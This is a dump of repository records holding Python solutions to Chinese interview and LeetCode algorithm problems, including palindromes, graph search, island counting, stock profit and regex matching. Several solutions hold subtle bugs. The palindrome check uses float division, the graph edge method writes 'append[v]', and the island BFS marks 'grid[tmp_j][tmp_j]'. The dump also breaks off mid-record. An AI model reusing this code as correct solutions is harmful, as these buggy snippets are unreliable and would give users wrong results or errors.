"content_id": "8706fb5c1c5582356cc68425881f1afbafd331ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/leetcode-9回文数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/13 20:00\n# @Author : Meng Xiao\n\nclass Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0 or (x != 0 and x % 10 == 0):\n return False\n rev, y = 0, x\n while x > 0:\n rev = rev * 10 + x % 10\n x /= 10\n return y == rev"
},
{
"alpha_fraction": 0.33772894740104675,
"alphanum_fraction": 0.3523809611797333,
"avg_line_length": 31.452381134033203,
"blob_id": "ee622d76dcd5cc7b3b026fa9dac6c1a903fd16b1",
"content_id": "0e16145989c44095063e7ac6fba2645bfda72db4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 42,
"path": "/表示数值的字符串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午8:49\n# @Author : Meng Xiao\nclass Solution:\n def isNumeric(self, s):\n if len(s) <= 0:\n return False\n # 分别标记是否出现过正负号、小数点、e\n has_sign = False\n has_point = False\n has_e = False\n for i in range(len(s)):\n if s[i] == 'E' or s[i] == 'e':\n #不同时出现两个e\n if has_e:\n return False\n else:\n has_e = True\n if i == len(s) - 1: # e不能出现在最后\n return False\n elif s[i] == '+' or s[i] == '-':\n if has_sign:\n if s[i-1] != 'e' and s[i-1] != 'E':\n return False\n # 如果这是第一次出现符号位,而且出现的位置不是字符串第一个位置,那么就只能出现在e后面\n else:\n has_sign = True\n if i > 0 and s[i-1] != 'e' and s[i-1] != 'E':\n return False\n\n elif s[i] == '.':\n # 小数点不能出现两次并且如果出现过e,则不能再出现小数点\n if has_point or has_e:\n return False\n else:\n has_point = True\n if i > 0 and has_e:\n return False\n else:\n if s[i] < '0' or s[i] > '9':\n return False\n return True\n\n\n"
},
{
"alpha_fraction": 0.5047169923782349,
"alphanum_fraction": 0.5224056839942932,
"avg_line_length": 22.55555534362793,
"blob_id": "341e93db86be3adea886b83270c9e24d0121dbd2",
"content_id": "18250385b8c7f0082814c73579dfb00bd3cbbee3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 872,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 36,
"path": "/最小的k个数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/13 下午2:32\n# @Author : Meng Xiao\n'''\n快速排序取前K个\n'''\nclass Solution:\n def GetLeastNumbers_Solution(self, tinput, k):\n # write code here\n if not tinput or k > len(tinput):\n return []\n tinput = self.quick_sort(tinput)\n return tinput[:k]\n\n def quick_sort(self, lst):\n if not lst:\n return []\n pivot = lst[0]\n left = self.quick_sort([x for x in lst[1:] if x < pivot])\n right = self.quick_sort([x for x in lst[1:] if x >= pivot])\n\n return left + [pivot] + right\n\n'''\n方法2 堆\n'''\ndef getleastnums(array, k):\n import heapq\n max_heap = []\n for x in array:\n heapq.heappush(max_heap, -x)\n if len(max_heap) > k:\n heapq.heappop(max_heap)\n for x in max_heap:\n print(-x, end=' ')\n print()\n"
},
{
"alpha_fraction": 0.3468468487262726,
"alphanum_fraction": 0.38513514399528503,
"avg_line_length": 23.72222137451172,
"blob_id": "ee7981d316ed854784cae4dc70b7a77172894cba",
"content_id": "5b4bfde3dc027d0836021034bf76fc121d4dd05e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 18,
"path": "/leetcode-69 x的平方根.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/20 19:52\n# @Author : Meng Xiao\nclass Solution:\n def mySqrt(self, x):\n if x < 0:\n return\n left = 0\n right = x\n while right >= left:\n mid = (left + right) // 2\n if mid * mid > x:\n right = mid - 1\n elif mid * mid < x:\n left = mid + 1\n else:\n return mid\n return right"
},
{
"alpha_fraction": 0.41895604133605957,
"alphanum_fraction": 0.4532966911792755,
"avg_line_length": 26,
"blob_id": "ab5a90c2dbbc08f344f1cfc0dafb0ae37f0b671a",
"content_id": "4f52064407265d26af94f2c9509a8303ef292220",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 27,
"path": "/乱序数组排序后相邻最大差值.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 下午10:05\n# @Author : Meng Xiao\nclass Solution:\n def findMaxDivision(self, alist):\n if not alist:\n return\n length = len(alist)\n if length < 2:\n return 0\n maxnum = max(alist)\n minnum = min(alist)\n bucket = [0] * (maxnum-minnum+1) # 生成桶\n for i in range(length):\n bucket[alist[i]-minnum] += 1\n count = 0\n maxD = 0\n for i in range(len(bucket)):\n if bucket[i] == 0:\n count += 1\n else:\n if maxD < count:\n maxD = count\n count = 0\n return maxD + 1\ns = Solution()\nprint(s.findMaxDivision([1,1]))"
},
{
"alpha_fraction": 0.490278959274292,
"alphanum_fraction": 0.4995773434638977,
"avg_line_length": 25.863636016845703,
"blob_id": "838b32612eebf775afd4b4706a78448d4b349b37",
"content_id": "6bef86b5093307405b04cd1177cb0bf67b7a0654",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1191,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 44,
"path": "/图的遍历.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/24 下午8:37\n# @Author : Meng Xiao\nclass Graph(object):\n def __init__(self):\n self.node_neighbors = {}\n self.visited = {}\n\n def add_nodes(self, nodelist):\n for node in nodelist:\n self.add_node(node)\n\n def add_node(self, node):\n if not node in self.nodes():\n self.node_neighbors[node] = []\n\n def add_edge(self, edge):\n u, v = edge\n if v not in self.node_neighbors[u] and u not in self.node_neighbors[v]:\n self.node_neighbors[u].append[v]\n if u != v:\n self.node_neighbors[v].append(u)\n\n def nodes(self):\n return self.node_neighbors.keys()\n\n # 递归DFS\n def dfs_re(self, root=None):\n order = []\n def dfs(node):\n self.visited[node] = True\n order.append(node)\n for n in self.node_neighbors[node]:\n if not n in self.visited:\n dfs(n)\n if root:\n dfs(root)\n\n for node in self.nodes():\n if not node in self.visited:\n dfs(node)\n self.visited = {}\n print(order)\n return order\n\n"
},
{
"alpha_fraction": 0.39463600516319275,
"alphanum_fraction": 0.45019155740737915,
"avg_line_length": 21.69565200805664,
"blob_id": "8a5bb4d05da47d553497dd34f6a6c4dc1d262ff7",
"content_id": "aed9114e2557bfc622b39fee454bf99afa2598bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 23,
"path": "/最少操作.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/18 下午3:39\n# @Author : Meng Xiao\n\na = [1,2,2,2,5,7,8,8]\na.sort()\nmaxn = a[-1] #最大数\nminn = a[0] #最小数\ndict = {} # 数字对应出现的次数\nfor x in range(minn,2*maxn):\n dict[x] = 0\nfor ii in a:\n dict[ii] += 1\ncount = 0 # 记录操作次数\nfor key in dict:\n if dict[key] > 1:\n for i in range(dict[key]-1):\n for nn in dict:\n if nn > key and dict[nn] == 0:\n dict[nn] += 1\n count += (nn - key)\n break\nprint(count)\n"
},
{
"alpha_fraction": 0.49703264236450195,
"alphanum_fraction": 0.5163204669952393,
"avg_line_length": 27.125,
"blob_id": "539768a99c69bdb6e4b454a6a03a2f970abe4ee9",
"content_id": "daf521c7183a870e3e26a5712b4d9f3e7bf1b652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 24,
"path": "/从上到下打印二叉树.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/10 下午5:16\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def PrintFromTopToBottom(self, root):\n if root is None:\n return []\n queue = [] # 临时队列\n result = [] # 结果\n\n queue.append(root)\n while(len(queue)) > 0:\n currentRoot = queue.pop(0)\n result.append(currentRoot.val)\n if currentRoot.left:\n queue.append(currentRoot.left)\n if currentRoot.right:\n queue.append(currentRoot.right)\n return result"
},
{
"alpha_fraction": 0.42994505167007446,
"alphanum_fraction": 0.4780219793319702,
"avg_line_length": 30.65217399597168,
"blob_id": "008580baddc4528fa4f0e402dff2905a0fdf511b",
"content_id": "805e58977ba3574f58169b65b371c000d40f6d50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 23,
"path": "/数组中唯一只出现一次的数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午7:33\n# @Author : Meng Xiao\nclass Solution:\n def findNumAppOnce(self, array):\n if not array or len(array) == 0:\n return\n max_length = max([len(bin(x))for x in array]) - 2\n bits_count = [0] * max_length\n for x in array:\n bit_mask = 1\n for bit_index in range(max_length-1, -1, -1):\n if x & bit_mask != 0:\n bits_count[bit_index] += 1\n bit_mask = bit_mask << 1\n\n result = 0\n for count in bits_count:\n result = result << 1\n result += count % 3\n return result\ns = Solution()\nprint(s.findNumAppOnce([2, 18, 3, 7, 3, 3, 2, 7, 2, 7]))\n"
},
{
"alpha_fraction": 0.31851252913475037,
"alphanum_fraction": 0.3427647650241852,
"avg_line_length": 26.808988571166992,
"blob_id": "ac0ee2efe93f4a21faf46357b82f2ab5a4b4a34e",
"content_id": "50d73923d05572d71b64e66f8e0cb015f0dc51bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2484,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 89,
"path": "/leetcode-200岛屿数量.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/26 下午11:14\n# @Author : Meng Xiao\nclass Solution:\n # 1 DFS\n def numIslands(self, grid):\n if not grid:\n return 0\n row = len(grid)\n col = len(grid[0])\n cnt = 0\n\n def dfs(i, j):\n grid[i][j] = '0'\n for x, y in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n tmp_i = i + x\n tmp_j = j + y\n if 0 <= tmp_i < row and 0 <= tmp_j < col and grid[tmp_i][tmp_j] == '1':\n dfs(tmp_i, tmp_j)\n\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n dfs(i, j)\n cnt += 1\n return cnt\n\n # bfs\n def numIsLands_bfs(self, grid):\n if not grid:\n return 0\n row = len(grid)\n col = len(grid[0])\n cnt = 0\n\n def bfs(i, j):\n queue = []\n queue.append((i, j))\n grid[i][j] = '0'\n while queue:\n i, j = queue.pop(0)\n for x, y in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n tmp_i = i + x\n tmp_j = j + y\n if 0 <= tmp_i < row and 0 <= tmp_j < col and grid[tmp_i][tmp_j] == '1':\n grid[tmp_j][tmp_j] = '0'\n queue.append((tmp_i ,tmp_j))\n\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n bfs(i, j)\n cnt += 1\n return cnt\n\n # 并查集\n def numIslands_b(self, grid):\n\n if not grid:\n return 0\n row = len(grid)\n col = len(grid[0])\n\n f = {}\n\n def find(x):\n f.setdefault(x, x)\n if f[x] != x:\n f[x] = find(f[x])\n return f[x]\n\n def union(x, y):\n f[find(x)] = find(y)\n\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n for x, y in [[1, 0], [0, 1]]:\n tmp_i = i + x\n tmp_j = j + y\n if 0 <= tmp_i < row and 0 <= tmp_j < col and grid[tmp_i][tmp_j] == '1':\n union(tmp_i*col+tmp_j, i*col+j)\n\n res = set()\n for i in range(row):\n for j in range(col):\n if grid[i][j] == '1':\n res.add(find(i*col+j))\n return len(res)"
},
{
"alpha_fraction": 0.43583816289901733,
"alphanum_fraction": 0.4809248447418213,
"avg_line_length": 24.47058868408203,
"blob_id": "50653fd01b58a2925679c33ae87fe9e95f556581",
"content_id": "de767ae17d13554aea3af82e2b84964daf73888c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 915,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 34,
"path": "/数组中只出现一次的两个数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午7:04\n# @Author : Meng Xiao\nclass Solution:\n def FindNumsAppearOnce(self, array):\n if array == None:\n return []\n xor = 0\n for i in array:\n xor ^= i\n idxOf1 = self.getFirstIdx(xor)\n num1 = num2 = 0\n for j in range(len(array)):\n if self.IsBit(array[j], idxOf1):\n num1 ^= array[j]\n else:\n num2 ^= array[j]\n return num1, num2\n\n def getFirstIdx(self, num):\n # 寻找num中第一个1的位置(从右往左)\n idx = 0\n while num & 1 == 0 and idx <= 32:\n idx += 1\n num = num >> 1\n return idx\n\n def IsBit(self, num, indexBit):\n # 判断num的第indexBit位是不是1\n num = num >> indexBit\n return num & 1\n\ns = Solution()\nprint(s.FindNumsAppearOnce([2,4,3,6,3,2,5,5]))"
},
{
"alpha_fraction": 0.4494117498397827,
"alphanum_fraction": 0.4752941131591797,
"avg_line_length": 24.75757598876953,
"blob_id": "adf912f139333818c5629d750c2ec1493b3f5866",
"content_id": "c42792193be6b2940a00de56093fb8da3476ad14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/数组中出现次数超过一半的数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/13 下午2:29\n# @Author : Meng Xiao\n\n\nclass Solution:\n def MoreThanHalfNum(self, numbers):\n length = len(numbers)\n if not numbers:\n return 0\n result = numbers[0]\n times = 1\n\n for i in range(1, length):\n if times == 0:\n result = numbers[i]\n times = 1\n elif numbers[i] == result:\n times += 1\n else:\n times -= 1\n if not self.CheckMoreThanHalf(numbers, length, result):\n return False\n return result\n\n def CheckMoreThanHalf(self, numbers, length, number):\n times = 0\n for i in range(length):\n if numbers[i] == number:\n times += 1\n if times * 2 <= length:\n return False\n return True\n"
},
{
"alpha_fraction": 0.3487544357776642,
"alphanum_fraction": 0.41281139850616455,
"avg_line_length": 20.538461685180664,
"blob_id": "a13642d6eeceeca472052eb76ffa9b179a90ea68",
"content_id": "6a3d9e2f59dfd84d8a45a53e033ec7a9f7ac37ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 13,
"path": "/二进制中1的个数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/27 下午9:33\n# @Author : Meng Xiao\n\nclass Solution:\n def Numberof1(self, n):\n count = 0\n if n < 0:\n n = n & 0xffffffff\n while n != 0:\n count += 1\n n = (n - 1) & n\n return count\n\n"
},
{
"alpha_fraction": 0.4883260726928711,
"alphanum_fraction": 0.5152354836463928,
"avg_line_length": 30.97468376159668,
"blob_id": "e89d29d632dc6d9b391844695024c1466c7841dd",
"content_id": "4bdfab86778ac2ed7371a489d084c24f0dd41226",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2869,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 79,
"path": "/股票的最大利润.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午9:45\n# @Author : Meng Xiao\nclass Solution:\n # 只允许交易一次\n def maxDiff1(self, numbers):\n if not numbers or len(numbers) < 2:\n return 0\n minD = numbers[0] # 保存前i-1个数字的最小值\n maxDiff = numbers[1] - minD\n for i in range(2, len(numbers)):\n if numbers[i-1] < minD:\n minD = numbers[i-1]\n curDiff = numbers[i] - minD\n if curDiff > maxDiff:\n maxDiff = curDiff\n return maxDiff\n\n # 允许无数次交易\n def maxProfit(self, prices):\n if not prices or len(prices) < 2:\n return 0\n maxprof = 0\n minprice = 2 ** 32\n for p in prices:\n # 如果今天价格小于昨日价格,只更新minprice\n if p <= minprice:\n minprice = p\n # 今天价格大于昨日价格,最终受益加上这一段,并更新\n else:\n maxprof += (p-minprice)\n minprice = p\n return maxprof\n\n # 允许2次交易\\\n '''\n 动态规划法。以第i天为分界线,计算第i天之前进行一次交易的最大收益preProfit[i],\n 和第i天之后进行一次交易的最大收益postProfit[i],\n 最后遍历一遍,max{preProfit[i] + postProfit[i]} (0≤i≤n-1)就是最大收益。\n 第i天之前和第i天之后进行一次的最大收益求法同1。\n '''\n def maxProfit2(self, prices):\n if not prices or len(prices) < 2:\n return 0\n n = len(prices)\n preProfit = [0] * n\n postProfit = [0] * n\n\n curMin = prices[0]\n for i in range(1, n):\n curMin = min(curMin, prices[i])\n preProfit[i] = max(preProfit[i-1], prices[i]-curMin) # 第i天卖出\n\n curMax = prices[n-1]\n for i in range(n-2, -1, -1):\n curMax = max(curMax, prices[i])\n postProfit[i] = max(postProfit[i+1], curMax-prices[i]) # 第i天买入\n\n maxProfit = 0\n for i in range(n):\n maxProfit = max(maxProfit, preProfit[i]+postProfit[i])\n\n return maxProfit\n\n # 允许K次交易\n # https://blog.csdn.net/Dr_Unknown/article/details/51939121\n def maxProfit_k(self, k, prices):\n if len(prices) < 2:\n return 0\n if k > len(prices):\n return self.maxProfit(prices)\n local = [[0 for i in range(k+1)] for j in range(len(prices))]\n globa = [[0 for i in range(k + 1)] for j in range(len(prices))]\n for i in range(1, len(prices)):\n diff = prices[i] - prices[i-1]\n for j in range(1, k+1):\n local[i][j] = max(globa[i-1][j-1]+max(0,diff), local[i-1][j]+diff)\n globa[i][j] = max(local[i][j], globa[i-1][j])\n return globa[len(prices)-1][k]\n\n"
},
{
"alpha_fraction": 0.42848336696624756,
"alphanum_fraction": 0.4475955665111542,
"avg_line_length": 29.58490562438965,
"blob_id": "2e9224b1c643d51ed4bf621b21053a208bf1ed2d",
"content_id": "072c1605664a25fd043d551cd755f14745705672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1642,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 53,
"path": "/旋转数组的最小数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/26 下午8:20\n# @Author : Meng Xiao\nclass Solution:\n def minNumberInRotateArray(self, rotateArray):\n if len(rotateArray) == 0:\n return 0\n front = 0\n rear = len(rotateArray) - 1\n minVal = rotateArray[0]\n\n if rotateArray[front] < rotateArray[rear]:\n return rotateArray[front]\n else:\n while rear - front > 1:\n mid = (front + rear) // 2\n if rotateArray[mid] >= rotateArray[front]:\n front = mid\n elif rotateArray[mid] <= rotateArray[rear]:\n rear = mid\n elif rotateArray[front] == rotateArray[mid] == rotateArray[rear]:\n for i in range(1, len(rotateArray)):\n if rotateArray[i] < minVal:\n minVal = rotateArray[i]\n\n\n minVal = rotateArray[rear]\n return minVal\n\n\n\n# leetcode-33搜索旋转排序数组\nclass Solution2:\n def search(self, nums, target):\n if not nums:\n return -1\n left = 0\n right = len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == target:\n return mid\n if nums[mid] >= nums[left]:\n if nums[left] <= target <= nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if nums[mid] <= target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n"
},
{
"alpha_fraction": 0.4001966714859009,
"alphanum_fraction": 0.43067845702171326,
"avg_line_length": 22.65116310119629,
"blob_id": "4c4073c609024c94513387427dc24f0ea6ad44dd",
"content_id": "3daa7f86dd64e305b8209135a5d016213fae90dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1085,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 43,
"path": "/连续子数组的最大和.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/14 下午7:36\n# @Author : Meng Xiao\n\nclass Solution:\n '''\n 方法1 非动态规划\n '''\n def maxSum(self, alist):\n if not alist:\n return\n max_value = alist[0]\n tmpSum = alist[0]\n for i in range(1, len(alist)):\n if tmpSum < 0:\n tmpSum = alist[i]\n else:\n tmpSum += alist[i]\n if tmpSum > max_value:\n max_value = tmpSum\n return max_value\n '''\n 方法2 动态规划 dp[i]表示以第i结尾的的子数组中子数组的最大和\n '''\n def maxSumdp(self, alist):\n if not alist:\n return\n max_value = alist[0]\n dp = [0] * (len(alist)+1)\n dp[0] = alist[0]\n for i in range(1, len(alist)):\n if dp[i-1] < 0:\n dp[i] = alist[i]\n else:\n dp[i] = dp[i-1] + alist[i]\n if dp[i] > max_value:\n max_value = dp[i]\n return max_value\n\n\n\ns = Solution()\nprint(s.maxSumdp([-2,-8,-1,-5,-9]))\n"
},
{
"alpha_fraction": 0.4377387464046478,
"alphanum_fraction": 0.46982428431510925,
"avg_line_length": 37.5,
"blob_id": "98c998c0c03a34f1fd618f09f86f73a78f55bbd9",
"content_id": "6c4d68148db7943af304d3f3f18b42d39aa68356",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1537,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 34,
"path": "/正则表达式匹配.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午8:01\n# @Author : Meng Xiao\nclass Solution:\n def match(self, s, pattern):\n if len(s) == 0 and len(pattern) == 0:\n return True\n elif len(s) != 0 and len(pattern) == 0:\n return False\n elif len(s) == 0 and len(pattern) != 0:\n if len(pattern) > 1 and pattern[1] == '*':\n return self.match(s, pattern[2:])\n else:\n return False\n\n # 下面讨论s与pattern 都不为空的情况\n else:\n if len(pattern) > 1 and pattern[1] == '*':\n if s[0] != pattern[0] and pattern[0] != '.':\n return self.match(s, pattern[2:])\n\n else:\n # 如果s[0]与pattern[0]相同,且pattern[1]为*,这个时候有三种情况\n # pattern后移2个,s不变;相当于把pattern前两位当成空,匹配后面的\n # pattern后移2个,s后移1个;相当于pattern前两位与s[0]匹配\n # pattern不变,s后移1个;相当于pattern前两位,与s中的多位进行匹配,因为*可以匹配多位\n return self.match(s, pattern[2:]) or self.match(s[1:], pattern[2:]) or self.match(s[1:],pattern)\n\n # pattern第二个字符不为*的情况\n else:\n if s[0] == pattern[0] or pattern[0] == '.':\n return self.match(s[1:], pattern[1:])\n else:\n return False\n"
},
{
"alpha_fraction": 0.4306393265724182,
"alphanum_fraction": 0.46682751178741455,
"avg_line_length": 30.846153259277344,
"blob_id": "0ac45f3bb9063beed85dae8c3c59b0e49e0d5d61",
"content_id": "51a5609acb8c385e333022a48313719a405f936a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 833,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 26,
"path": "/滑动窗口的最大值.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午9:06\n# @Author : Meng Xiao\nclass Solution:\n def maxInWindows(self, num, size):\n if not num or size <= 0:\n return []\n if len(num) <= size:\n return [max(num)]\n deque = []\n index = []\n for i in range(size):\n while len(index) > 0 and num[i] > num[index[-1]]:\n index.pop()\n index.append(i)\n for i in range(size, len(num)):\n deque.append(num[index[0]])\n while len(index) > 0 and num[i] >= num[index[-1]]:\n index.pop()\n if len(index) > 0 and index[0] <= i - size:\n index.pop(0)\n index.append(i)\n deque.append(num[index[0]])\n return deque\ns = Solution()\nprint(s.maxInWindows([2,3,4,2,6,2,5,1],3))\n\n"
},
{
"alpha_fraction": 0.5347411632537842,
"alphanum_fraction": 0.5504087209701538,
"avg_line_length": 46.25806427001953,
"blob_id": "9c8d89378cde607d2e1f32016b45287acf418594",
"content_id": "fd799d2a0bf550938dc0cd4e00e23cbfab97556d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1472,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 31,
"path": "/矩阵中的路径.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/26 下午9:03\n# @Author : Meng Xiao\nclass Solution:\n def hasPath(self, matrix, rows, cols, string):\n if rows < 1 or cols < 1 or matrix == None or string == None:\n return False\n visited = [0] * (rows * cols)\n pathLength = 0\n for row in range(rows):\n for col in range(cols):\n if self.hasPathCore(matrix, rows, cols, row, col, string, pathLength, visited):\n return True\n return False\n\n def hasPathCore(self, matrix, rows, cols, row, col, string, pathLength, visited):\n if len(string) == pathLength:\n return True\n hasPath = False\n if row >= 0 and row < rows and col >= 0 and col < cols and matrix[row * cols + col] == string[pathLength] and not visited[row * cols + col]:\n pathLength += 1\n visited[row * cols + col] = True\n hasPath = self.hasPathCore(matrix, rows, cols, row, col - 1, string, pathLength, visited) or \\\n self.hasPathCore(matrix, rows, cols, row - 1, col, string, pathLength, visited) or \\\n self.hasPathCore(matrix, rows, cols, row, col + 1, string, pathLength, visited) or \\\n self.hasPathCore(matrix, rows, cols, row + 1, col, string, pathLength, visited)\n\n if not hasPath:\n pathLength -= 1\n visited[row * cols + col] = False\n return hasPath\n\n\n\n"
},
{
"alpha_fraction": 0.4925074875354767,
"alphanum_fraction": 0.5194805264472961,
"avg_line_length": 19.85416603088379,
"blob_id": "d52e0be480d51ec61286339dd63b3faa0ba72c14",
"content_id": "1b7ec780f5048802d0767318a6049af7c4e47584",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1015,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 48,
"path": "/二叉树的深度.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/17 下午8:50\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n '''\n 递归\n '''\n def TreeDepth(self, root):\n if not root:\n return 0\n return max(self.TreeDepth(root.left), self.TreeDepth(root.right)) + 1\n '''\n 非递归\n '''\n def TreeDepth1(self, root):\n if not root:\n return 0\n queue = []\n queue.append((root, 1))\n while queue:\n curnode, depth = queue.pop(0)\n if curnode.left:\n queue.append((curnode.left, depth+1))\n if curnode.right:\n queue.append((curnode.right, depth+1))\n return depth\n\ns = Solution()\na = TreeNode(1)\nb = TreeNode(2)\nc = TreeNode(3)\nd = TreeNode(4)\ne = TreeNode(5)\nf = TreeNode(6)\ng = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\ne.left = g\n\nprint(s.TreeDepth1(a))\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 20,
"blob_id": "d99c1e50226e8a4c21d52a5b11efd837dd576907",
"content_id": "0b14c1250aaf70ba87f6d03062173ca8d54b1de4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# 剑指OFFER题目 PYTHON实现\n"
},
{
"alpha_fraction": 0.34589502215385437,
"alphanum_fraction": 0.37685060501098633,
"avg_line_length": 28.760000228881836,
"blob_id": "8edbe04e76920b210f5b4ca81c5d4c50ece48ec4",
"content_id": "abbdd22f742e89eb8012ee2c9a0528a6bf9e6816",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 25,
"path": "/leetcode-16 最接近的三数之和.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
